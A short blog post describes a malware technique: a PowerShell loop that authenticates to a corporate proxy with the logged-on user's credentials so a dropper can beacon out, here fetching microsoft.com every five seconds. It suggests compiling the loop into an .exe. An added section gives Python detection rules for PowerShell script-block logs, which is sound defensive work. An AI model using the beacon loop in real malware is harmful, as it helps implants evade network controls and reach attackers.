Thursday, 5 May 2016

Authenticate to proxy with current credentials


When droppers are deployed on victim machines, they attempt to connect to the C&C centre; however, the corporate proxy comes into the picture.

The PowerShell code below authenticates to the proxy with the current user's credentials and fetches the contents of "http://microsoft.com".


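# $i is never incremented, so the loop repeats until the process is stopped
for($i=0; $i -le 0; $i)
{
    $wc = New-Object System.Net.WebClient
    # Authenticate to the system proxy as the logged-on user
    $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
    # Fetch the page through the authenticated proxy
    $wc.DownloadString('http://microsoft.com')
    # Wait 5 seconds before the next request
    Start-Sleep -s 5
}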

We can further convert the PowerShell script into an executable .exe file with PS2EXE.
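
For defenders, an added example (not from the original post): a Python triage over PowerShell script block logging records (event ID 4104) that flags the combination the script above uses, a download call made through the proxy with the logged-on user's credentials, and raises the severity when it sits in a sleep loop. The dict record layout, the severity labels and the sample records are assumptions constructed for illustration; fragments of one script are rejoined by ScriptBlockId before matching, because an indicator can be split across events.

```python
import re
from collections import defaultdict

# Patterns taken from the script on this page; each one alone is common and benign.
PATTERNS = {
    "proxy_default_creds": re.compile(
        r"\.Proxy\.Credentials\s*=\s*\[(?:System\.)?Net\.CredentialCache\]"
        r"::Default(?:Network)?Credentials", re.I),
    "download": re.compile(r"\.Download(?:String|Data|File)\s*\(", re.I),
    "sleep": re.compile(r"\bStart-Sleep\b", re.I),
    "loop": re.compile(r"\b(?:for|while)\s*\(", re.I),
}
URL = re.compile(r"https?://[^\s'\"\)]+", re.I)

def reassemble(events):
    """Join 4104 fragments that share a ScriptBlockId, ordered by MessageNumber."""
    parts = defaultdict(list)
    for ev in events:
        parts[ev["ScriptBlockId"]].append((ev["MessageNumber"], ev["ScriptBlockText"]))
    return {sid: "".join(text for _, text in sorted(frags)) for sid, frags in parts.items()}

def triage(events):
    """Return one finding per script block that downloads through the proxy with
    the logged-on user's credentials; loop + sleep raises the (assumed) severity."""
    findings = []
    for sid, text in reassemble(events).items():
        hits = {name for name, rx in PATTERNS.items() if rx.search(text)}
        if not {"proxy_default_creds", "download"} <= hits:
            continue
        severity = "high" if {"sleep", "loop"} <= hits else "medium"
        findings.append({"id": sid, "severity": severity, "urls": URL.findall(text)})
    return findings

# Constructed sample records (not real telemetry); "blk-1" arrives split and out of order.
SAMPLE = [
    {"ScriptBlockId": "blk-1", "MessageNumber": 2,
     "ScriptBlockText": "ials = [System.Net.CredentialCache]::DefaultNetworkCredentials\n"
                        "$wc.DownloadString('http://microsoft.com')\nStart-Sleep -s 5 }"},
    {"ScriptBlockId": "blk-1", "MessageNumber": 1,
     "ScriptBlockText": "while ($true) { $wc = New-Object System.Net.WebClient\n$wc.Proxy.Credent"},
    {"ScriptBlockId": "blk-2", "MessageNumber": 1,
     "ScriptBlockText": "(New-Object Net.WebClient).DownloadString('http://intranet.example/a.txt')"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A hit is a lead for review rather than a verdict, since legitimate administration scripts also pass default credentials to a proxy.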